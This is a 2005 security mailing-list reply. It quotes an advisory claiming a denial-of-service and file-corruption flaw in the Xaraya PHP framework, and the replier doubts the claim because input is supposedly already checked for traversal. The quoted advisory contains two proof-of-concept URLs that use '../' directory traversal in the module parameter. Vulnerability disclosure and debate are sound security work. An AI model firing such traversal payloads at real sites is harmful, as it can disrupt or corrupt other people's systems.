On 29 Nov 2005 retrogod@xxxxxxxxxxxxx wrote: > Xaraya <= 1.0.0 RC4 D.O.S / file corruption > > software: > site: http://www.xaraya.com > description: "Xaraya 1.0 Core is an Open Source web application framework > written in PHP" > i) you can create an empty dir, in some cases this leads to D.O.S. condition,poc: > > http://[target]/[path_to_xaraya]/index.php?module=../../../../.key.php > http://[target]/[path_to_xaraya]/index.php?module=../../../../../.htaccess Being that Xaraya is a fork from Post nuke which is a fork off PHP Nuke the input would already have been checked for directory traversal among other things. -- Paul Laudanski, Microsoft MVP Windows-Security [de] http://de.castlecops.com [en] http://castlecops.com [wiki] http://wiki.castlecops.com
